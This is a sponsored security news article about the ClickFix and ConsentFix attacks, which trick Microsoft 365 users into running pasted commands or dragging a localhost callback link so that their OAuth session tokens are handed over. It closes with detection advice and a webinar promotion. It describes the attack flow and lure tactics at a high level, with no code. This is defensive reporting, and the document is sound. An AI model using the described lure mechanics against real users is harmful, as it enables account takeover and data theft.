BigTech CompaniesCybersecurityNewswireTechnology

Microsoft 365 Accounts Hijacked in 3 Seconds via ConsentFix & ClickFix

Originally published on: July 3, 2026
▼ Summary

– Modern cyberattacks like ClickFix and ConsentFix succeed by embedding malicious steps into routine user workflows, bypassing traditional security awareness.
– ConsentFix targets Microsoft 365 by tricking users into dragging a localhost link into a browser, which surrenders OAuth tokens and grants attackers session access without passwords or MFA.
– A detailed walkthrough of ConsentFix was posted on a public Russian cybercrime forum in early March 2026, including code and tutorials, lowering the barrier for attackers.
– These attacks exploit trained user habits, such as breezing through CAPTCHAs or sign-in prompts, to execute commands or steal sessions through seemingly normal actions.
– Defenders need endpoint and identity monitoring to detect traces like unusual PowerShell activity or unexpected logins, as awareness alone is insufficient against these engineered attacks.

It starts with a simple, seemingly harmless action: dragging a link into your browser. In just three seconds, a threat actor can capture the tokens needed to hijack your Microsoft 365 account. You never typed a password into a fake login page, and you never violated any rule from traditional security awareness training. You simply followed a set of instructions that looked perfectly normal.

This is the hallmark of modern cybercrime. It doesn’t break down the door. Instead, it slips quietly into the middle of your everyday workflow, turning a routine action into the moment everything goes wrong.

Why These Attacks Keep Working

These attacks succeed because of the habits we’ve all developed online. Clicking through CAPTCHAs, accepting cookie prompts, pressing a key combination to move a process along. That trained reflex is exactly what attackers are counting on.

This is the core mechanism behind ClickFix attacks. Victims see a fake prompt instructing them to press a specific sequence of keyboard shortcuts. This action pastes and executes attacker-supplied commands on their own machine. There is no vulnerability to exploit and no firewall to confront. Just a convincing lie inserted at the right moment.

ClickFix surged in 2025 and remains a potent threat, but attackers have already evolved the concept into something more sophisticated.

Figure 1 below shows the ClickFix-style fake verification prompt.

[Figure 1: In a ClickFix attack, the victim follows fake verification steps that ultimately trigger malicious code on their own machine.]

A New Attack Variant Targeting Microsoft 365 Sessions

The newer variant, ConsentFix, shifts the attack surface to Microsoft 365’s OAuth consent flows. These are the sign-in prompts that users have learned to breeze through without much scrutiny.

The setup is deceptively clean. A phishing lure arrives, often delivered through trusted platforms like Dropbox or DocSend, sometimes behind a password that makes it harder for security tooling to inspect the content.

The victim clicks through, encounters what looks like a standard Microsoft authentication screen, and is asked to complete the process by dragging a localhost callback link into the browser.

That drag-and-drop step is the trap. Instead of finishing a harmless authentication step, the user unknowingly surrenders OAuth tokens. This hands the attacker session access to email and other Microsoft 365 services, bypassing both passwords and multi-factor authentication (MFA).

The victim isn’t typing credentials into a fake form. They are completing what appears to be a legitimate authentication flow, and the session itself is what gets stolen.

Figure 2 below shows how ConsentFix turns what looks like a normal Microsoft 365 sign-in step into session theft.

[Figure 2: ConsentFix hijacks the Microsoft 365 sign-in flow by turning a familiar user action into stolen session access.]

Criminals Are Sharing the Blueprint Openly

By early March 2026, a detailed walkthrough of ConsentFix had been posted to a public Russian cybercrime forum. It included working code, infrastructure screenshots, and a video tutorial showing exactly how to build and deploy the attack.

The infrastructure relied on free or widely available services. The post also outlined how attackers profile targets before sending a single phishing message, using LinkedIn and similar tools to map organizations and tailor lures to real people.

What was once a technique requiring meaningful technical skill now comes packaged with documentation and step-by-step guidance. The barrier to entry keeps dropping.

How to Reduce Your Exposure

Awareness still has a role. These attacks depend on people moving through familiar workflows without pausing. Asking why a website wants you to press hotkeys or drag a strange link into a browser is often enough to short-circuit the whole thing.

But awareness alone won’t close the gap, because these attacks are specifically engineered to look routine. Defenders also need detection coverage for the traces they leave behind: unusual PowerShell activity originating from normal user processes, or new session logins from unexpected locations.

Endpoint and identity monitoring can surface those signals before a brief lapse in judgment snowballs into a full account compromise.

The attacker’s job is to interrupt a normal workflow at exactly the right moment and let the victim do the rest. Understanding that pattern is the first step toward stopping it.

Tradecraft Tuesday: No Products. No Pitches. Just Hacks.

Tradecraft Tuesday provides cybersecurity professionals with an in-depth analysis of the latest threat actors, attack vectors, and mitigation strategies. Each weekly session features technical walkthroughs of recent incidents, comprehensive breakdowns of malware trends, and up-to-date indicators of compromise (IOCs).

Participants gain:

  • Detailed briefings on emerging threat campaigns and ransomware variants[Register for Tradecraft Tuesday →]Advance your defensive posture with real-time intelligence and technical education specifically designed for those responsible for safeguarding their organization’s environment.Sponsored and written by Huntress Labs.
(Source: BleepingComputer)

Topics

clickfix attacks 95% consentfix attacks 95% oauth token theft 90% user workflow exploitation 90% phishing lures 85% account takeover 85% attack tradecraft 85% mfa bypass 80% endpoint monitoring 80% cybercrime forum sharing 80%